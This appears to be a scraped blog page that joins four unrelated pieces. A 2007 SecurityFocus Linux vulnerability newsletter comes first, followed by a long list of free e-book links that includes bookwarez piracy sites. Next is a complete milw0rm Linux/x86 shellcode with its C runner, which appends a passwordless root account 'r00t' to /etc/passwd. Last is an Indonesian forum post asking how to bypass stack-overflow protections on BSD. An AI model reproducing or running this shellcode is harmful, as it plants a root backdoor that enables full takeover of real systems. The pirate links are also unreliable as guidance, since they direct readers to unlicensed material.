SecurityFocus Linux Newsletter #361
----------------------------------------
This issue is Sponsored by: CSI

CSI 2007, November 3-9 in Washington, DC, is the only conference that delivers a business-focused overview of enterprise security.
It will convene 2,000+ delegates, 80 exhibitors and features 100+ sessions/seminars providing a roadmap for integrating policies and procedures with new tools and techniques.
Register now for savings on conference fees and/or free exhibits admission.
www.csiannual.com
SECURITY BLOGS
SecurityFocus has selected a few syndicated sources that stand out as conveying topics of interest for our community. We are proud to offer content from Matasano at this time and will be adding more in the coming weeks.
http://www.securityfocus.com/blogs
------------------------------------------------------------------
I. FRONT AND CENTER
1.Rebinding attacks unbound
2.Aspect-Oriented Programming and Security
II. LINUX VULNERABILITY SUMMARY
1. Red Hat Linux Kernel Stack Unwinder Local Denial Of Service Vulnerability
2. Linux Kernel eHCA Driver Physical Address Space Information Disclosure Vulnerability
3. 3proxy FTP Proxy Double Free Memory Corruption Vulnerability
4. Sun Java Runtime Environment Virtual Machine Remote Privilege Escalation Vulnerability
5. Gnome-Screensaver With Compiz Lock Bypass Vulnerability
6. XEN Xenmon.py Xenbaked Insecure Temporary File Creation Vulnerability
7. JustSystem Ichitaro JSTARO4.OCX and TJSVDA.DLL Multiple Buffer Overflow Vulnerabilities
8. Trend Micro AntiVirus Engine Tmxpflt.SYS Local Buffer Overflow Vulnerability
9. RealNetworks RealPlayer File Parsing Routines Multiple Vulnerabilities
10. vobcopy vobcopy.bla Insecure Temporary File Creation Vulnerability
11. Liferea Feedlist.OPML Local Information Disclosure Vulnerability
12. CUPS IPP Tag Handling Remote Buffer Overflow Vulnerability
13. McAfee E-Business Server Authentication Packet Handling Integer Overflow Vulnerability
14. Mono System.Math BigInteger Buffer Overflow Vulnerability
III. LINUX FOCUS LIST SUMMARY
1. Linux Hardening
IV. UNSUBSCRIBE INSTRUCTIONS
V. SPONSOR INFORMATION

I. FRONT AND CENTER
---------------------
1.Rebinding attacks unbound
By Federico Biancuzzi
DNS rebinding was discovered in 1996 and affected the Java Virtual Machine (VM). Recently a group of researchers at Stanford found out that this vulnerability is still present in browsers and that the common solution, known as DNS pinning, is not effective anymore.
http://www.securityfocus.com/columnists/455

2.Aspect-Oriented Programming
By Rohit Sethi
Aspect-oriented programming (AOP) is a paradigm that is quickly gaining traction in the development world. At least partially spurred by the popularity of the Java Spring framework [1], people are beginning to understand the substantial benefits that AOP brings to development.
http://www.securityfocus.com/infocus/1895


II. LINUX VULNERABILITY SUMMARY
------------------------------------
1. Red Hat Linux Kernel Stack Unwinder Local Denial Of Service Vulnerability
BugTraq ID: 26158
Remote: No
Date Published: 2007-10-22
Relevant URL: http://www.securityfocus.com/bid/26158
Summary:
The Red Hat Linux kernel is prone to a local denial-of-service vulnerability.

A local attacker can exploit this issue to crash the affected kernel, denying service to legitimate users.

2. Linux Kernel eHCA Driver Physical Address Space Information Disclosure Vulnerability
BugTraq ID: 26161
Remote: No
Date Published: 2007-10-22
Relevant URL: http://www.securityfocus.com/bid/26161
Summary:
The Linux kernel is prone to an information-disclosure vulnerability.

Successful exploits will allow attackers to obtain a portion of the physical address space. Information harvested may aid in further attacks.

3. 3proxy FTP Proxy Double Free Memory Corruption Vulnerability
BugTraq ID: 26180
Remote: Yes
Date Published: 2007-10-23
Relevant URL: http://www.securityfocus.com/bid/26180
Summary:
3proxy is prone to a double-free memory-corruption vulnerability.

Attackers may be able to exploit this issue to cause denial-of-service conditions.

This issue affects 3proxy 0.5.3i; other versions may also be vulnerable.

4. Sun Java Runtime Environment Virtual Machine Remote Privilege Escalation Vulnerability
BugTraq ID: 26185
Remote: Yes
Date Published: 2007-10-23
Relevant URL: http://www.securityfocus.com/bid/26185
Summary:
The Sun Java Runtime Environment is prone to a remote privilege-escalation vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the user who invoked the Java applet. Successfully exploiting this issue may result in the remote compromise of affected computers.

5. Gnome-Screensaver With Compiz Lock Bypass Vulnerability
BugTraq ID: 26188
Remote: No
Date Published: 2007-10-23
Relevant URL: http://www.securityfocus.com/bid/26188
Summary:
Gnome-screensaver is prone to a vulnerability that allows an attacker who has physical console access to bypass the user's locked screen.

This issue affects gnome-screensaver released with Ubuntu 7.10; fixes from Ubuntu are available; other versions may also be affected.

6. XEN Xenmon.py Xenbaked Insecure Temporary File Creation Vulnerability
BugTraq ID: 26190
Remote: No
Date Published: 2007-10-23
Relevant URL: http://www.securityfocus.com/bid/26190
Summary:
Xen is prone to a security vulnerability because it creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to perform symlink attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to overwrite or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.

This issue affects Xen 3.0; other versions may also be vulnerable.

7. JustSystem Ichitaro JSTARO4.OCX and TJSVDA.DLL Multiple Buffer Overflow Vulnerabilities
BugTraq ID: 26206
Remote: Yes
Date Published: 2007-10-25
Relevant URL: http://www.securityfocus.com/bid/26206
Summary:
JustSystem Ichitaro is prone to multiple unspecified buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data before copying it to insufficiently sized buffers.

Successful exploits may allow attackers to execute arbitrary code in the context of a vulnerable application; failed attempts will likely cause denial-of-service conditions.

These issues affect these versions:

Ichitaro 11, 12, 13, 2004, 2005, 2006, 2007
Ichitaro for Linux
Ichitaro Lite2
Punch
Ichitaro viewer

Other versions may also be affected.

8. Trend Micro AntiVirus Engine Tmxpflt.SYS Local Buffer Overflow Vulnerability
BugTraq ID: 26209
Remote: No
Date Published: 2007-10-25
Relevant URL: http://www.securityfocus.com/bid/26209
Summary:
Trend Micro AntiVirus engine is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.

Successful exploits may allow an attacker to execute arbitrary machine code with SYSTEM-level privileges and completely compromise affected computers. Failed exploit attempts could crash the computer, denying service to legitimate users.

Applications that incorporate 'Tmxpflt.sys' 8.320.1004 and 8.500.0.1002 from the AntiVirus engine are vulnerable, including Trend Micro PC-cillin Internet Security 2007, ServerProtect, and OfficeScan.

9. RealNetworks RealPlayer File Parsing Routines Multiple Vulnerabilities
BugTraq ID: 26214
Remote: Yes
Date Published: 2007-10-25
Relevant URL: http://www.securityfocus.com/bid/26214
Summary:
RealNetworks RealPlayer is prone to multiple memory-corruption vulnerabilities that arise when the application processes specially crafted files.

Successfully exploiting these issues will allow remote attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will cause a denial-of-service condition.

10. vobcopy vobcopy.bla Insecure Temporary File Creation Vulnerability
BugTraq ID: 26233
Remote: No
Date Published: 2007-10-29
Relevant URL: http://www.securityfocus.com/bid/26233
Summary:
The 'vobcopy' tool creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to perform symlink attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to overwrite or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.

11. Liferea Feedlist.OPML Local Information Disclosure Vulnerability
BugTraq ID: 26254
Remote: No
Date Published: 2007-10-30
Relevant URL: http://www.securityfocus.com/bid/26254
Summary:
Liferea is prone to a local information-disclosure vulnerability because the application fails to set file permissions correctly on a backup file.

Attackers can leverage this issue to obtain sensitive information used to construct valid login credentials.

This issue affects versions prior to Liferea 1.4.6.

12. CUPS IPP Tag Handling Remote Buffer Overflow Vulnerability
BugTraq ID: 26268
Remote: Yes
Date Published: 2007-10-31
Relevant URL: http://www.securityfocus.com/bid/26268
Summary:
CUPS is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial of service.

CUPS 1.3.3 is reported vulnerable; other versions may be affected as well.

13. McAfee E-Business Server Authentication Packet Handling Integer Overflow Vulnerability
BugTraq ID: 26269
Remote: Yes
Date Published: 2007-10-31
Relevant URL: http://www.securityfocus.com/bid/26269
Summary:
The application is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun.

Successfully exploiting this issue may allow attackers to execute arbitrary code within the context of the affected application. This is turn may result in a complete compromise of the affected system. Failed exploit attempts will result in a denial of service.

The issue affects McAfee E-Business Server 8.1.1 for Linux and 8.5.2 for Solaris. Versions for Windows are not affected.

14. Mono System.Math BigInteger Buffer Overflow Vulnerability
BugTraq ID: 26279
Remote: Yes
Date Published: 2007-10-31
Relevant URL: http://www.securityfocus.com/bid/26279
Summary:
Mono is prone to a buffer-overflow vulnerability because the application fails to adequately perform boundary checks on user-supplied data.

Successfully exploiting this issue could allow attackers to execute arbitrary code in the context of the user running an affected application. Failed exploit attempts will likely result in a denial-of-service condition.

III. LINUX FOCUS LIST SUMMARY
---------------------------------
1. Linux Hardening
http://www.securityfocus.com/archive/91/482082

Read More...... Read More...

Ini Kumpulan link Ebook Gratis,silakan dipelajari

List of free E-books O'Reilly online
http://www.oreilly.com/openbook/
http://sysadmin.oreilly.com/

Computer books and manuals
http://www.hoganbooks.com/freebook/webbooks.html
http://www.informit.com/itlibrary/
http://www.fore.com/support/manuals/home/home.htm
http://www.adobe.com/products/acrobat/webbuy/freebooks.html

The Network Book
http://www.cs.columbia.edu/netbook/

Some #bookwarez.efnet.irc links
http://www.extrema.net/books/links.shtml

Some #bookwarez.efnet.irc fiction
http://194.58.154.90:4431/enscifi/

Pimpas online books (Indonesia)
http://202.159.16.55/~pimpa2000
http://202.159.15.46/~om-pimpa/buku

Security, privacy and cryptography
http://theory.lcs.mit.edu/~rivest/crypto-security.html
http://www.oberlin.edu/~brchkind/cyphernomicon/

My own misc online reading material
http://www.eastcoastfx.com/docs/admin-guides/
http://www.eastcoastfx.com/~jorn/reading/

Computer books
http://solaris.inorg.chem.msu.ru/cs-books/
http://sweetrude.net/~cab/books/
http://alaska.mine.nu/books/
http://poprocks.dyn.ns.ca/dave/books/
http://58-160.skarland.uaf.edu/books/
http://202.186.247.194/~ebook/
http://hooligans.org/reference/

Linux documentation
http://www.linuxdoc.org/docs.html

FreeBSD documentation
http://www.freebsd.org/tutorials/

Sun documentation
http://osiris.imw.tu-clausthal.de:8888/
http://uran.vvsu.ru:8888/

SGI documentation
http://newton.unicc.chalmers.se/ebt-bin/nph-dweb/dynaweb;td=2
http://techpubs.sgi.com/library/tpl/cgi-bin/init.cgi

IBM Online Redbooks
http://www.redbooks.ibm.com/

Digital Unix documentation
http://www.unix.digital.com/faqs/publications/base_doc/DOCUMENTATION/V40D_HTML/V 40D_HTML/LIBRARY.HTM

Filesystem Hierarchy Standard
http://www.pathname.com/fhs/2.0/fhs-toc.html
http://www.linuxbase.com/

UNIX stuff
http://www.ucs.ed.ac.uk/~unixhelp/index.html
http://www.uwsg.indiana.edu/usail/
http://www.isu.edu/departments/comcom/unix/workshop/unixindex.html |
http://www.franken.de/users/lorien/unix.html
http://www.cs.buffalo.edu/~milun/

unix.programming.html Programmers reading
http://www.programmersheaven.com/
http://www.cs.monash.edu.au/~alanf/se_proj97/

Programming Perls 2nd edition
http://www.cs.bell-labs.com/cm/cs/pearls/

C stuff
http://www.strath.ac.uk/CC/Courses/NewCcourse/ccourse.html
http://www.cm.cf.ac.uk/Dave/C/CE.html
http://www.cprogramming.com/tutorial.html
http://www.cs.virginia.edu/c++programdesign/slides/
http://www.icce.rug.nl/docs/cplusplus/cplusplus.html

Perl stuff
http://www.webdesigns1.com/perl/ir.html
http://www.ictp.trieste.it/texi/perl/perl_toc.html
http://www.itknowledge.com/tpj/
http://www.plover.com/~mjd/perl/

Java stuff
http://www.cs.brown.edu/courses/cs016/book/
http://polaris.cis.ksu.edu/~schmidt/CIS200/
http://www.daimi.au.dk/dProg1/java/langspec-1.0/index.html

Lisp stuff
http://www.cs.cmu.edu/afs/cs.cmu.edu/project/airepository/ai/html/cltl/mirrors.html
http://www.cs.tulane.edu/www/Villamil/lisp/

Ada stuff
http://www.adahome.com/Tutorials/

Database reading
http://www.bus.orst.edu/faculty/brownc/lectures/db_tutor/index.htm

SQL stuff
http://w3.one.net/~jhoffman/sqltut.htm
http://www.doc.mmu.ac.uk/STAFF/E.Ferneley/SQL/index.htm
http://www.daimi.au.dk/~oracle/sql/index.html

Visual Basic stuff
http://www.vb-world.net/books/

Handbook of Applied Cryptography
http://www.cacr.math.uwaterloo.ca/hac/

X Window System
http://tronche.com/gui/x/ h
http://www.cen.com/mw3/refs.html
http://www.gaijin.com/X/

GTK and Gnome stuff
http://developer.gnome.org/doc/GGAD/ggad.html

QT and KDE stuff
http://www.troll.no/qt/
http://developer.kde.org/documentation/tutorials/index.html
http://www.arrakis.es/~rlarrosa/tutorial.html

Corba stuff
http://www.iona.com/hyplan/vinoski/

TCP/IP info
http://www.tunix.kun.nl/ptr/tcpip.html

Misc programmers reading
http://www.cs.wisc.edu/~chilimbi/Pubs.html
http://www.ic.arizona.edu/~nromano/spring99/readings.htm

Some useful tech articles
http://www.sysadminmag.com/
http://www.dotcomma.org/

Considering Hacking Constructive
http://www.firstmonday.dk/issues/issue4_2/gisle/index.html

Eric's Random Writings
http://www.tuxedo.org/~esr/writings/

IBM's History
http://www.ibm.com/ibm/history/story/text.html

Electronic Publishing
http://www.civeng.carleton.ca/~nholtz/ElectronicPublishing.html

Digital processing
http://www.dspguide.com/pdfbook.htm

The Hardware Book
http://sunsite.auc.dk/hwb/

Network iQ Router Reference Manual
http://www.teltrend.co.nz/documentation/networkiq/rel74/html/rmtoc.htm

Cisco Product Documentation
http://www.cisco.com/univercd/cc/td/doc/product/

Novell developers appnotes
http://developer.novell.com/research/appnotes/

Icons for your desktop
http://nether.tky.hut.fi/iconstore/

Symbols and signs and ideograms and stuff
http://www.symbols.com/ Dictionaries
http://www.ohiolink.edu/db/oed.html
http://www.ohiolink.edu/db/ahd.html
http://www.ohiolink.edu/db/columbia.html
http://www.ohiolink.edu/db/thes.html
http://www.eb.com:180/

Misc reading material
http://dali.orgland.ru/tcd/
http://www.ud.se/english/press/pdf_publ.htm

Dantes Inferno
http://sophia.smith.edu/~lkleinbe/dante/home.html
http://www.divinecomedy.org/

Books and texts
http://digital.library.upenn.edu/books/
http://www.cs.cmu.edu/books.html
http://www.ipl.org/reading/books/
http://www.nakedword.org/
http://sunsite.berkeley.edu/alex/

Literature stuff
http://lion.chadwyck.co.uk:8080/
http://www.swan.ac.uk/uwp/lit.htm

Octavo books
http://www.octavo.com/

Project Gutenberg - books and texts
http://www.promo.net/pg/

Project Runeberg - Scandinavian in books and texts
http://www.lysator.liu.se/runeberg/katalog.html

The Elements of Style
http://www.bartleby.com/141/index.html

Bigtext - illustrated books and manuals for DOS
http://www.ozemail.com.au/~kevsol/oldfav.html

#bigtext Breeze - a complete text system for Windows
http://www.ozemail.com.au/~kevsol/sware.html

#brzwin Language links
http://www.june29.com/HLP/

Grimms' fairy tales
http://www.nationalgeographic.com/grimm/archive.html

Winnie the Pooh
http://www.machaon.ru/pooh/

Seven Wonders of the World
http://ce.eng.usf.edu/pharos/wonders/

Medieval history
http://www.fordham.edu/halsall/sbook2.html

Misc history
http://www.usaor.net/users/ipm/contents.html
http://www.homeusers.prestel.co.uk/littleton/re0_cath.htm

Stonehenges Legends
http://www.missgien.net/stonehenge/legends.html

In Parentheses historical papers
http://www.inpar.dhs.org/

Bulfinchs Mythology
http://www.bulfinch.org/

The Dead Sea Scrolls
http://lcweb.loc.gov/exhibits/scrolls/toc.html

Qumran historical site
http://www.kalia.org.il/Qumran/

Index of cults
http://www.totentanz.de/kmedeke/cults.htm

Heretical speculation
http://www.calweb.com/~queribus/gnosticgnus.html

The esoteric Ordo Supremus Militaris Templi Hierosolymitani
http://www.osmth.org/index.html

Runes and Norse stuff
http://www.multiart.nu/grimner/
http://www.eastcoastfx.com/~jorn/runes/

Extinction level events
http://members.xoom.com/korwisi/ele/english/index.html
http://impact.arc.nasa.gov/
http://www.boulder.swri.edu/clark/ncar.html

Stephen Hawkings Universe
http://www.pbs.org/wnet/hawking/html/home

html The constellations
http://www.dibonsmith.com/constel.htm

Falling into a black hole
http://casasrv.colorado.edu/~ajsh/schw.shtml

Gravity is a push
http://www.epicom.com/gravitypush/

Online audiobooks
http://www.broadcast.com/books/scifi/

ElecBooks
http://www.elecbook.com/eblist.htm

NewMedia Classics
http://www.newmediaclassics.com/

Online Books Archive
http://docs.online.bg/

Internet Public Library
http://www.ipl.org/

Rocket-Library.com
http://www.rocket-library.com/categories.asp

PalmPilot E-Text
Ring http://www.webring.org/cgi-bin/webring?ring=pilot_text&id=2&List

Virtual Free Books
http://www.virtualfreesites.com/free.books.am.html

About Ebooks
http://aalbc.com/ebooks/Allaboutebooks.htm

Read More...... Read More...

/* By Kris Katterjohn 11/14/2006

 *

 * 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd

 *

 * for Linux/x86

 *

 *

 *

 * section .text

 *

 *      global _start

 *

 * _start:

 *

 * ; open("/etc//passwd", O_WRONLY | O_APPEND)

 *

 *      push byte 5

 *      pop eax

 *      xor ecx, ecx

 *      push ecx

 *      push 0x64777373

 *      push 0x61702f2f

 *      push 0x6374652f

 *      mov ebx, esp

 *      mov cx, 02001Q

 *      int 0x80

 *

 *      mov ebx, eax

 *

 * ; write(ebx, "r00t::0:0:::", 12)

 *

 *      push byte 4

 *      pop eax

 *      xor edx, edx

 *      push edx

 *      push 0x3a3a3a30

 *      push 0x3a303a3a

 *      push 0x74303072

 *      mov ecx, esp

 *      push byte 12

 *      pop edx

 *      int 0x80

 *

 * ; close(ebx)

 *

 *      push byte 6

 *      pop eax

 *      int 0x80

 *

 * ; exit()

 *

 *      push byte 1

 *      pop eax

 *      int 0x80

 */



main()

{

       char shellcode[] =

               "\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68"

               "\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66"

               "\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2"

               "\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68"

               "\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a"

               "\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80";



       (*(void (*)()) shellcode)();

}



// milw0rm.com [2006-11-17]

linux/x86 add root user r00t with no password to /etc/passwd 69 bytes

powered by performancing firefox

Read More...... Read More...

linux (most of linux distribution):



Proteksi stack pake virtual address, randomize stack



handling overflow pakek SIGSEGV, stack bisa dioverwrite



mudah sekali bypass va







freebsd 6.1:



handling overflow pakek SIGSEGV, stack bisa di overwrite



bypass stack shield masih gagal coz i'm not freebsd user




openbsd 3.9:



handling overflow pakek SIGABRT, overflow di kill pakek sys_kill()



sulit sekali overwrite stack, proteksi non executable stack

it seems imposible to exploits stack overflow in openbsd

returning libc??sama kena SIGABRT







PoC :



linux http://student.te.ugm.ac.id/~phoenix03/compare.txt



freebsd ??



openbsd ??







Ada yang mau kasih tambahan referense bypass proteksi stack



di mesin bsd. thx jika ada referensi




Kecoak Elektronik Indonesia :: Lihat topik - stack overflow exploitation (Linux vs FreeBSD vs OpenBSD)

powered by performancing firefox

Read More...... Read More...